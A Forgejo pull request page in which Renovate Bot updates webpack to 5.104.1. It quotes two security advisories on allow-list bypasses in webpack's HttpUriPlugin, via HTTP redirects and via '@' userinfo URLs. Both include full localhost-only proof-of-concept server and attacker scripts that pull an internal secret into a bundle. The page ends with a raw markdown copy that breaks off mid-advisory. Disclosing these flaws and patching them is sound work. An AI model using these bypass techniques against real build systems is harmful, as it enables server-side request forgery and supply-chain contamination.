forgejo/forgejo
forgejo/forgejo
120
4.9k
Fork 842
Code Issues 1.3k Pull requests 152 Projects Releases 106 Packages 1 Activity Actions 10

Update dependency webpack to v5.104.1 [SECURITY] (v14.0/forgejo) #11398

Merged
viceice merged 1 commit from renovate/v14.0/forgejo-npm-webpack-vulnerability into v14.0/forgejo 2026-02-22 09:13:24 +01:00
Conversation 0 Commits 1 Files changed 2 +22 -15
viceice-bot commented 2026-02-21 15:34:45 +01:00
Member
Copy link

This PR contains the following updates:

Package Change Age Confidence
webpack 5.103.05.104.1 age confidence

webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence

CVE-2025-68157 / GHSA-38r7-794h-5758

More information

Details

Summary

When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) enforces allowedUris only for the initial URL, but does not re-validate allowedUris after following HTTP 30x redirects. As a result, an import that appears restricted to a trusted allow-list can be redirected to HTTP(S) URLs outside the allow-list. This is a policy/allow-list bypass that enables build-time SSRF behavior (requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion in build outputs (redirected content is treated as module source and bundled). In my reproduction, the internal response is also persisted in the buildHttp cache.

Details

In the HTTP scheme resolver, the allow-list check (allowedUris) is performed when metadata/info is created for the original request (via getInfo()), but the content-fetch path follows redirects by resolving the Location URL without re-checking whether the redirected URL is within allowedUris.

Practical consequence: if an “allowed” host/path can return a 302 (or has an open redirect), it can point to an external URL or an internal-only URL (SSRF). The redirected response is consumed as module content, bundled, and can be cached. If the redirect target is attacker-controlled, this can potentially result in attacker-controlled JavaScript being bundled and later executed when the resulting bundle runs.

Figure 1 (evidence screenshot): left pane shows the allowed host issuing a 302 redirect to http://127.0.0.1:9100/secret.js; right pane shows the build output confirming allow-list bypass and that the secret appears in the bundle and buildHttp cache.

image
PoC

This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.

1) Setup
mkdir split-ssrf-poc && cd split-ssrf-poc
npm init -y
npm i -D webpack webpack-cli
2) Create server.js

#!/usr/bin/env node
"use strict";

const http = require("http");
const url = require("url");

const allowedPort = 9000;
const internalPort = 9100;

const internalUrlDefault = `http://127.0.0.1:${internalPort}/secret.js`;
const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
  `export const secret = ${JSON.stringify(secret)};\n` +
  `export default "ok";\n`;

function start(port, handler) {
  return new Promise(resolve => {
    const s = http.createServer(handler);
    s.listen(port, "127.0.0.1", () => resolve(s));
  });
}

(async () => {
  // Internal-only service (SSRF target)
  await start(internalPort, (req, res) => {
    if (req.url === "/secret.js") {
      res.statusCode = 200;
      res.setHeader("Content-Type", "application/javascript; charset=utf-8");
      res.end(internalPayload);
      console.log(`[internal] 200 /secret.js served (secret=${secret})`);
      return;
    }
    res.statusCode = 404;
    res.end("not found");
  });

  // Allowed host (redirector)
  await start(allowedPort, (req, res) => {
    const parsed = url.parse(req.url, true);

    if (parsed.pathname === "/redirect.js") {
      const to = parsed.query.to || internalUrlDefault;

      // Safety guard: only allow redirecting to localhost internal service in this PoC
      if (!to.startsWith(`http://127.0.0.1:${internalPort}/`)) {
        res.statusCode = 400;
        res.end("to must be internal-only in this PoC");
        console.log(`[allowed] blocked redirect to: ${to}`);
        return;
      }

      res.statusCode = 302;
      res.setHeader("Location", to);
      res.end("redirecting");
      console.log(`[allowed] 302 /redirect.js -> ${to}`);
      return;
    }

    res.statusCode = 404;
    res.end("not found");
  });

  console.log(`\nServer running:`);
  console.log(`- allowed host:  http://127.0.0.1:${allowedPort}/redirect.js`);
  console.log(`- internal-only: http://127.0.0.1:${internalPort}/secret.js`);
})();
3) Create attacker.js

#!/usr/bin/env node
"use strict";

const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");
const webpackPkg = require("webpack/package.json");

const allowedPort = 9000;
const internalPort = 9100;

const allowedBase = `http://127.0.0.1:${allowedPort}/`;
const internalTarget = `http://127.0.0.1:${internalPort}/secret.js`;
const entryUrl = `${allowedBase}redirect.js?to=${encodeURIComponent(internalTarget)}`;

async function walk(dir) {
  const out = [];
  const items = await fs.readdir(dir, { withFileTypes: true });
  for (const it of items) {
    const p = path.join(dir, it.name);
    if (it.isDirectory()) out.push(...await walk(p));
    else if (it.isFile()) out.push(p);
  }
  return out;
}

async function fileContains(f, needle) {
  try {
    const buf = await fs.readFile(f);
    return buf.toString("utf8").includes(needle) || buf.toString("latin1").includes(needle);
  } catch {
    return false;
  }
}

async function findInFiles(files, needle) {
  const hits = [];
  for (const f of files) if (await fileContains(f, needle)) hits.push(f);
  return hits;
}

const fmtBool = b => (b ? "✅" : "❌");

(async () => {
  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-attacker-"));
  const srcDir = path.join(tmp, "src");
  const distDir = path.join(tmp, "dist");
  const cacheDir = path.join(tmp, ".buildHttp-cache");
  const lockfile = path.join(tmp, "webpack.lock");
  const bundlePath = path.join(distDir, "bundle.js");

  await fs.mkdir(srcDir, { recursive: true });
  await fs.mkdir(distDir, { recursive: true });

  await fs.writeFile(
    path.join(srcDir, "index.js"),
    `import { secret } from ${JSON.stringify(entryUrl)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
  );

  const config = {
    context: tmp,
    mode: "development",
    entry: "./src/index.js",
    output: { path: distDir, filename: "bundle.js" },
    experiments: {
      buildHttp: {
        allowedUris: [allowedBase],
        cacheLocation: cacheDir,
        lockfileLocation: lockfile,
        upgrade: true
      }
    }
  };

  const compiler = webpack(config);

  compiler.run(async (err, stats) => {
    try {
      if (err) throw err;

      const info = stats.toJson({ all: false, errors: true, warnings: true });
      if (stats.hasErrors()) {
        console.error(info.errors);
        process.exitCode = 1;
        return;
      }

      const bundle = await fs.readFile(bundlePath, "utf8");
      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
      const secret = m ? m[0] : null;

      console.log("\n[ATTACKER RESULT]");
      console.log(`- webpack version: ${webpackPkg.version}`);
      console.log(`- node version: ${process.version}`);
      console.log(`- allowedUris: ${JSON.stringify([allowedBase])}`);
      console.log(`- imported URL (allowed only): ${entryUrl}`);
      console.log(`- temp dir: ${tmp}`);
      console.log(`- lockfile: ${lockfile}`);
      console.log(`- cacheDir: ${cacheDir}`);
      console.log(`- bundle:   ${bundlePath}`);

      if (!secret) {
        console.log("\n[SECURITY SUMMARY]");
        console.log(`- bundle contains internal secret marker: ${fmtBool(false)}`);
        return;
      }

      const lockHit = await fileContains(lockfile, secret);

      let cacheFiles = [];
      try { cacheFiles = await walk(cacheDir); } catch { cacheFiles = []; }
      const cacheHit = cacheFiles.length ? (await findInFiles(cacheFiles, secret)).length > 0 : false;

      const allTmpFiles = await walk(tmp);
      const allHits = await findInFiles(allTmpFiles, secret);

      console.log(`\n- extracted secret marker from bundle: ${secret}`);

      console.log("\n[SECURITY SUMMARY]");
      console.log(`- Redirect allow-list bypass: ${fmtBool(true)} (imported allowed URL, but internal target was fetched)`);
      console.log(`- Internal target (SSRF-like): ${internalTarget}`);
      console.log(`- EXPECTED: internal target should be BLOCKED by allowedUris`);
      console.log(`- ACTUAL: internal content treated as module and bundled`);

      console.log("\n[EVIDENCE CHECKLIST]");
      console.log(`- bundle contains secret:   ${fmtBool(true)}`);
      console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);
      console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);

      console.log("\n[PERSISTENCE CHECK] files containing secret");
      for (const f of allHits.slice(0, 30)) console.log(`- ${f}`);
      if (allHits.length > 30) console.log(`- ... and ${allHits.length - 30} more`);
    } catch (e) {
      console.error(e);
      process.exitCode = 1;
    } finally {
      compiler.close(() => {});
    }
  });
})();
4) Run

Terminal A:

node server.js

Terminal B:

node attacker.js
5) Expected

Expected: Redirect target should be rejected if not in allowedUris (only http://127.0.0.1:9000/ is allowed).

Impact

Vulnerability class: Policy/allow-list bypass leading to SSRF behavior at build time and untrusted content inclusion in build outputs (and potentially bundling of attacker-controlled JavaScript if the redirect target is attacker-controlled).

Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary (to restrict remote module fetching). In such environments, an attacker who can influence imported URLs (e.g., via source contribution, dependency manipulation, or configuration) and can cause an allowed endpoint to redirect can:

trigger network requests from the build machine to internal-only services (SSRF behavior),

cause content from outside the allow-list to be bundled into build outputs,

and cause fetched responses to persist in build artifacts (e.g., buildHttp cache), increasing the risk of later exfiltration.

Severity

  • CVSS Score: Unknown
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@​) leading to build-time SSRF behavior

CVE-2025-68458 / GHSA-8fgc-7cc6-rx7x

More information

Details

Summary

When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) can be bypassed to fetch resources from hosts outside allowedUris by using crafted URLs that include userinfo (username:password@host). If allowedUris enforcement relies on a raw string prefix check (e.g., uri.startsWith(allowed)), a URL that looks allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a policy/allow-list bypass that enables build-time SSRF behavior (outbound requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache.

Reproduced on:

  • webpack version: 5.104.0
  • Node version: v18.19.1
Details

Root cause (high level): allowedUris validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., new URL(uri)), which interprets the authority as the part after @.

Example crafted URL:

  • http://127.0.0.1:9000@​127.0.0.1:9100/secret.js

If the allow-list is ["http://127.0.0.1:9000"], then:

  • Raw string check:
    crafted.startsWith("http://127.0.0.1:9000")true
  • URL parsing (WHAT new URL() will contact):
    originhttp://127.0.0.1:9100 (host/port after @)

As a result, webpack fetches http://127.0.0.1:9100/secret.js even though allowedUris only included http://127.0.0.1:9000.

Evidence from reproduction:

  • Server logs showed the internal-only endpoint being fetched:
    • [internal] 200 /secret.js served (...) (observed multiple times)
  • Attacker-side build output showed:
    • the internal secret marker was present in the bundle
    • the internal secret marker was present in the buildHttp cache
image-2
PoC

This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.

1) Setup
mkdir split-userinfo-poc && cd split-userinfo-poc
npm init -y
npm i -D webpack webpack-cli
2) Create server.js

#!/usr/bin/env node
"use strict";

const http = require("http");

const ALLOWED_PORT = 9000;   // allowlisted-looking host
const INTERNAL_PORT = 9100;  // actual target if bypass succeeds

const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
  `// internal-only\n` +
  `export const secret = ${JSON.stringify(secret)};\n` +
  `export default "ok";\n`;

function listen(port, handler) {
  return new Promise(resolve => {
    const s = http.createServer(handler);
    s.listen(port, "127.0.0.1", () => resolve(s));
  });
}

(async () => {
  // "Allowed" host (should NOT be contacted if bypass works as intended)
  await listen(ALLOWED_PORT, (req, res) => {
    console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`);
    res.statusCode = 200;
    res.setHeader("Content-Type", "application/javascript; charset=utf-8");
    res.end(`export default "ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY";\n`);
  });

  // Internal-only service (SSRF-like target)
  await listen(INTERNAL_PORT, (req, res) => {
    if (req.url === "/secret.js") {
      console.log(`[internal] 200 /secret.js served (secret=${secret})`);
      res.statusCode = 200;
      res.setHeader("Content-Type", "application/javascript; charset=utf-8");
      res.end(internalPayload);
      return;
    }
    console.log(`[internal] 404 ${req.method} ${req.url}`);
    res.statusCode = 404;
    res.end("not found");
  });

  console.log("\nServers up:");
  console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`);
  console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`);
})();
2) Create server.js

#!/usr/bin/env node
"use strict";

const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");

function fmtBool(b) { return b ? "✅" : "❌"; }

async function walk(dir) {
  const out = [];
  let items;
  try { items = await fs.readdir(dir, { withFileTypes: true }); }
  catch { return out; }
  for (const it of items) {
    const p = path.join(dir, it.name);
    if (it.isDirectory()) out.push(...await walk(p));
    else if (it.isFile()) out.push(p);
  }
  return out;
}

async function fileContains(f, needle) {
  try {
    const buf = await fs.readFile(f);
    const s1 = buf.toString("utf8");
    if (s1.includes(needle)) return true;
    const s2 = buf.toString("latin1");
    return s2.includes(needle);
  } catch {
    return false;
  }
}

(async () => {
  const webpackVersion = require("webpack/package.json").version;

  const ALLOWED_PORT = 9000;
  const INTERNAL_PORT = 9100;

  // NOTE: allowlist is intentionally specified without a trailing slash
  // to demonstrate the risk of raw string prefix checks.
  const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`;

  // Crafted URL using userinfo so that:
  // - The string begins with allowedUri
  // - The actual authority (host:port) after '@​' is INTERNAL_PORT
  const crafted = `http://127.0.0.1:${ALLOWED_PORT}@​127.0.0.1:${INTERNAL_PORT}/secret.js`;
  const parsed = new URL(crafted);

  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-httpuri-userinfo-poc-"));
  const srcDir = path.join(tmp, "src");
  const distDir = path.join(tmp, "dist");
  const cacheDir = path.join(tmp, ".buildHttp-cache");
  const lockfile = path.join(tmp, "webpack.lock");
  const bundlePath = path.join(distDir, "bundle.js");

  await fs.mkdir(srcDir, { recursive: true });
  await fs.mkdir(distDir, { recursive: true });

  await fs.writeFile(
    path.join(srcDir, "index.js"),
    `import { secret } from ${JSON.stringify(crafted)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
  );

  const config = {
    context: tmp,
    mode: "development",
    entry: "./src/index.js",
    output: { path: distDir, filename: "bundle.js" },
    experiments: {
      buildHttp: {
        allowedUris: [allowedUri],
        cacheLocation: cacheDir,
        lockfileLocation: lockfile,
        upgrade: true
      }
    }
  };

  console.log("\n[ENV]");
  console.log(`- webpack version: ${webpackVersion}`);
  console.log(`- node version:    ${process.version}`);
  console.log(`- allowedUris:     ${JSON.stringify([allowedUri])}`);

  console.log("\n[CRAFTED URL]");
  console.log(`- import specifier: ${crafted}`);
  console.log(`- WHAT startsWith() sees: begins with "${allowedUri}" => ${fmtBool(crafted.startsWith(allowedUri))}`);
  console.log(`- WHAT URL() parses:`);
  console.log(`  - username: ${JSON.stringify(parsed.username)} (userinfo)`);
  console.log(`  - password: ${JSON.stringify(parsed.password)} (userinfo)`);
  console.log(`  - hostname: ${parsed.hostname}`);
  console.log(`  - port:     ${parsed.port}`);
  console.log(`  - origin:   ${parsed.origin}`);
  console.log(`  - NOTE: request goes to origin above (host/port after @​), not to "${allowedUri}"`);

  const compiler = webpack(config);

  compiler.run(async (err, stats) => {
    try {
      if (err) throw err;
      const info = stats.toJson({ all: false, errors: true, warnings: true });

      if (stats.hasErrors()) {
        console.error("\n[WEBPACK ERRORS]");
        console.error(info.errors);
        process.exitCode = 1;
        return;
      }

      const bundle = await fs.readFile(bundlePath, "utf8");
      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
      const foundSecret = m ? m[0] : null;

      console.log("\n[RESULT]");
      console.log(`- temp dir:  ${tmp}`);
      console.log(`- bundle:    ${bundlePath}`);
      console.log(`- lockfile:  ${lockfile}`);
      console.log(`- cacheDir:  ${cacheDir}`);

      console.log("\n[SECURITY CHECK]");
      console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`);

      if (foundSecret) {
        const lockHit = await fileContains(lockfile, foundSecret);

        const cacheFiles = await walk(cacheDir);
        let cacheHit = false;
        for (const f of cacheFiles) {
          if (await fileContains(f, foundSecret)) { cacheHit = true; break; }
        }

        console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);
        console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);
      }
    } catch (e) {
      console.error(e);
      process.exitCode = 1;
    } finally {
      compiler.close(() => {});
    }
  });
})();
4) Run

Terminal A:

node server.js

Terminal B:

node attacker.js
5) Expected vs Actual

Expected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed).

Actual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache.

Impact

Vulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs.

Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination.

Severity

  • CVSS Score: Unknown
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Release Notes

webpack/webpack (webpack)

v5.104.1

Compare Source

Patch Changes
  • 2efd21b: Reexports runtime calculation should not accessing WEBPACK_IMPORT_KEY decl with var.
  • c510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.

v5.104.0

Compare Source

Minor Changes
  • d3dd841: Use method shorthand to render module content in __webpack_modules__ object.
  • d3dd841: Enhance import.meta.env to support object access.
  • 4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.
  • 04cd530: Handle more at-rules for CSS modules.
  • cafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.
  • d3dd841: Added base64url, base62, base58, base52, base49, base36, base32 and base25 digests.
  • 5983843: Provide a stable runtime function variable __webpack_global__.
  • d3dd841: Improved localIdentName hashing for CSS.
Patch Changes
  • 22c48fb: Added module existence check for informative error message in development mode.
  • 50689e1: Use the fully qualified class name (or export name) for [fullhash] placeholder in CSS modules.
  • d3dd841: Support universal lazy compilation.
  • d3dd841: Fixed module library export definitions when multiple runtimes.
  • d3dd841: Fixed CSS nesting and CSS custom properties parsing.
  • d3dd841: Don't write fragment from URL to filename and apply fragment to module URL.
  • aab1da9: Fixed bugs for css/global type.
  • d3dd841: Compatibility import.meta.filename and import.meta.dirname with eval devtools.
  • d3dd841: Handle nested __webpack_require__.
  • 728ddb7: The speed of identifier parsing has been improved.
  • 0f8b31b: Improve types.
  • d3dd841: Don't corrupt debugId injection when hidden-source-map is used.
  • 2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.
  • d3dd841: Serialize HookWebpackError.
  • d3dd841: Added ability to use built-in properties in dotenv and define plugin.
  • 3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.
  • d3dd841: Reduce collision for local indent name in CSS.
  • d3dd841: Remove CSS link tags when CSS imports are removed.

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - Between 12:00 AM and 03:59 AM ( * 0-3 * * * ) (UTC).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [webpack](https://github.com/webpack/webpack) | [`5.103.0` → `5.104.1`](https://renovatebot.com/diffs/npm/webpack/5.103.0/5.104.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/webpack/5.104.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/webpack/5.103.0/5.104.1?slim=true) | --- ### webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence [CVE-2025-68157](https://nvd.nist.gov/vuln/detail/CVE-2025-68157) / [GHSA-38r7-794h-5758](https://github.com/advisories/GHSA-38r7-794h-5758) <details> <summary>More information</summary> #### Details ##### Summary When `experiments.buildHttp` is enabled, webpack’s HTTP(S) resolver (`HttpUriPlugin`) enforces `allowedUris` only for the **initial** URL, but **does not re-validate `allowedUris` after following HTTP 30x redirects**. As a result, an import that appears restricted to a trusted allow-list can be redirected to **HTTP(S) URLs outside the allow-list**. This is a **policy/allow-list bypass** that enables **build-time SSRF behavior** (requests from the build machine to internal-only endpoints, depending on network access) and **untrusted content inclusion in build outputs** (redirected content is treated as module source and bundled). In my reproduction, the internal response is also persisted in the buildHttp cache. ##### Details In the HTTP scheme resolver, the allow-list check (`allowedUris`) is performed when metadata/info is created for the original request (via `getInfo()`), but the content-fetch path follows redirects by resolving the `Location` URL without re-checking whether the redirected URL is within `allowedUris`. Practical consequence: if an “allowed” host/path can return a 302 (or has an open redirect), it can point to an external URL or an internal-only URL (SSRF). The redirected response is consumed as module content, bundled, and can be cached. If the redirect target is attacker-controlled, this can potentially result in attacker-controlled JavaScript being bundled and later executed when the resulting bundle runs. **Figure 1 (evidence screenshot):** left pane shows the allowed host issuing a 302 redirect to `http://127.0.0.1:9100/secret.js`; right pane shows the build output confirming allow-list bypass and that the secret appears in the bundle and buildHttp cache. <img width="1648" height="461" alt="image" src="https://github.com/user-attachments/assets/bb25f3ff-1919-49f9-951b-ad50bf0c7524" /> ##### PoC This PoC is intentionally constrained to **127.0.0.1** (localhost-only “internal service”) to demonstrate SSRF behavior safely. ##### 1) Setup ```bash mkdir split-ssrf-poc && cd split-ssrf-poc npm init -y npm i -D webpack webpack-cli ``` ##### 2) Create server.js ```js #!/usr/bin/env node "use strict"; const http = require("http"); const url = require("url"); const allowedPort = 9000; const internalPort = 9100; const internalUrlDefault = `http://127.0.0.1:${internalPort}/secret.js`; const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`; const internalPayload = `export const secret = ${JSON.stringify(secret)};\n` + `export default "ok";\n`; function start(port, handler) { return new Promise(resolve => { const s = http.createServer(handler); s.listen(port, "127.0.0.1", () => resolve(s)); }); } (async () => { // Internal-only service (SSRF target) await start(internalPort, (req, res) => { if (req.url === "/secret.js") { res.statusCode = 200; res.setHeader("Content-Type", "application/javascript; charset=utf-8"); res.end(internalPayload); console.log(`[internal] 200 /secret.js served (secret=${secret})`); return; } res.statusCode = 404; res.end("not found"); }); // Allowed host (redirector) await start(allowedPort, (req, res) => { const parsed = url.parse(req.url, true); if (parsed.pathname === "/redirect.js") { const to = parsed.query.to || internalUrlDefault; // Safety guard: only allow redirecting to localhost internal service in this PoC if (!to.startsWith(`http://127.0.0.1:${internalPort}/`)) { res.statusCode = 400; res.end("to must be internal-only in this PoC"); console.log(`[allowed] blocked redirect to: ${to}`); return; } res.statusCode = 302; res.setHeader("Location", to); res.end("redirecting"); console.log(`[allowed] 302 /redirect.js -> ${to}`); return; } res.statusCode = 404; res.end("not found"); }); console.log(`\nServer running:`); console.log(`- allowed host: http://127.0.0.1:${allowedPort}/redirect.js`); console.log(`- internal-only: http://127.0.0.1:${internalPort}/secret.js`); })(); ``` ##### 3) Create attacker.js ```js #!/usr/bin/env node "use strict"; const path = require("path"); const os = require("os"); const fs = require("fs/promises"); const webpack = require("webpack"); const webpackPkg = require("webpack/package.json"); const allowedPort = 9000; const internalPort = 9100; const allowedBase = `http://127.0.0.1:${allowedPort}/`; const internalTarget = `http://127.0.0.1:${internalPort}/secret.js`; const entryUrl = `${allowedBase}redirect.js?to=${encodeURIComponent(internalTarget)}`; async function walk(dir) { const out = []; const items = await fs.readdir(dir, { withFileTypes: true }); for (const it of items) { const p = path.join(dir, it.name); if (it.isDirectory()) out.push(...await walk(p)); else if (it.isFile()) out.push(p); } return out; } async function fileContains(f, needle) { try { const buf = await fs.readFile(f); return buf.toString("utf8").includes(needle) || buf.toString("latin1").includes(needle); } catch { return false; } } async function findInFiles(files, needle) { const hits = []; for (const f of files) if (await fileContains(f, needle)) hits.push(f); return hits; } const fmtBool = b => (b ? "✅" : "❌"); (async () => { const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-attacker-")); const srcDir = path.join(tmp, "src"); const distDir = path.join(tmp, "dist"); const cacheDir = path.join(tmp, ".buildHttp-cache"); const lockfile = path.join(tmp, "webpack.lock"); const bundlePath = path.join(distDir, "bundle.js"); await fs.mkdir(srcDir, { recursive: true }); await fs.mkdir(distDir, { recursive: true }); await fs.writeFile( path.join(srcDir, "index.js"), `import { secret } from ${JSON.stringify(entryUrl)}; console.log("LEAKED_SECRET:", secret); export default secret; ` ); const config = { context: tmp, mode: "development", entry: "./src/index.js", output: { path: distDir, filename: "bundle.js" }, experiments: { buildHttp: { allowedUris: [allowedBase], cacheLocation: cacheDir, lockfileLocation: lockfile, upgrade: true } } }; const compiler = webpack(config); compiler.run(async (err, stats) => { try { if (err) throw err; const info = stats.toJson({ all: false, errors: true, warnings: true }); if (stats.hasErrors()) { console.error(info.errors); process.exitCode = 1; return; } const bundle = await fs.readFile(bundlePath, "utf8"); const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i); const secret = m ? m[0] : null; console.log("\n[ATTACKER RESULT]"); console.log(`- webpack version: ${webpackPkg.version}`); console.log(`- node version: ${process.version}`); console.log(`- allowedUris: ${JSON.stringify([allowedBase])}`); console.log(`- imported URL (allowed only): ${entryUrl}`); console.log(`- temp dir: ${tmp}`); console.log(`- lockfile: ${lockfile}`); console.log(`- cacheDir: ${cacheDir}`); console.log(`- bundle: ${bundlePath}`); if (!secret) { console.log("\n[SECURITY SUMMARY]"); console.log(`- bundle contains internal secret marker: ${fmtBool(false)}`); return; } const lockHit = await fileContains(lockfile, secret); let cacheFiles = []; try { cacheFiles = await walk(cacheDir); } catch { cacheFiles = []; } const cacheHit = cacheFiles.length ? (await findInFiles(cacheFiles, secret)).length > 0 : false; const allTmpFiles = await walk(tmp); const allHits = await findInFiles(allTmpFiles, secret); console.log(`\n- extracted secret marker from bundle: ${secret}`); console.log("\n[SECURITY SUMMARY]"); console.log(`- Redirect allow-list bypass: ${fmtBool(true)} (imported allowed URL, but internal target was fetched)`); console.log(`- Internal target (SSRF-like): ${internalTarget}`); console.log(`- EXPECTED: internal target should be BLOCKED by allowedUris`); console.log(`- ACTUAL: internal content treated as module and bundled`); console.log("\n[EVIDENCE CHECKLIST]"); console.log(`- bundle contains secret: ${fmtBool(true)}`); console.log(`- cache contains secret: ${fmtBool(cacheHit)}`); console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`); console.log("\n[PERSISTENCE CHECK] files containing secret"); for (const f of allHits.slice(0, 30)) console.log(`- ${f}`); if (allHits.length > 30) console.log(`- ... and ${allHits.length - 30} more`); } catch (e) { console.error(e); process.exitCode = 1; } finally { compiler.close(() => {}); } }); })(); ``` ##### 4) Run Terminal A: ```bash node server.js ``` Terminal B: ```bash node attacker.js ``` ##### 5) Expected Expected: Redirect target should be rejected if not in allowedUris (only http://127.0.0.1:9000/ is allowed). ##### Impact Vulnerability class: Policy/allow-list bypass leading to SSRF behavior at build time and untrusted content inclusion in build outputs (and potentially bundling of attacker-controlled JavaScript if the redirect target is attacker-controlled). Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary (to restrict remote module fetching). In such environments, an attacker who can influence imported URLs (e.g., via source contribution, dependency manipulation, or configuration) and can cause an allowed endpoint to redirect can: trigger network requests from the build machine to internal-only services (SSRF behavior), cause content from outside the allow-list to be bundled into build outputs, and cause fetched responses to persist in build artifacts (e.g., buildHttp cache), increasing the risk of later exfiltration. #### Severity - CVSS Score: Unknown - Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N` #### References - [https://github.com/webpack/webpack/security/advisories/GHSA-38r7-794h-5758](https://github.com/webpack/webpack/security/advisories/GHSA-38r7-794h-5758) - [https://nvd.nist.gov/vuln/detail/CVE-2025-68157](https://nvd.nist.gov/vuln/detail/CVE-2025-68157) - [https://github.com/webpack/webpack](https://github.com/webpack/webpack) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-38r7-794h-5758) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@&#8203;) leading to build-time SSRF behavior [CVE-2025-68458](https://nvd.nist.gov/vuln/detail/CVE-2025-68458) / [GHSA-8fgc-7cc6-rx7x](https://github.com/advisories/GHSA-8fgc-7cc6-rx7x) <details> <summary>More information</summary> #### Details ##### Summary When `experiments.buildHttp` is enabled, webpack’s HTTP(S) resolver (`HttpUriPlugin`) can be bypassed to fetch resources from **hosts outside `allowedUris`** by using crafted URLs that include **userinfo** (`username:password@host`). If `allowedUris` enforcement relies on a **raw string prefix check** (e.g., `uri.startsWith(allowed)`), a URL that *looks* allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a **policy/allow-list bypass** that enables **build-time SSRF behavior** (outbound requests from the build machine to internal-only endpoints, depending on network access) and **untrusted content inclusion** (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache. Reproduced on: - webpack version: **5.104.0** - Node version: **v18.19.1** ##### Details **Root cause (high level):** `allowedUris` validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., `new URL(uri)`), which interprets the **authority** as the part after `@`. Example crafted URL: - 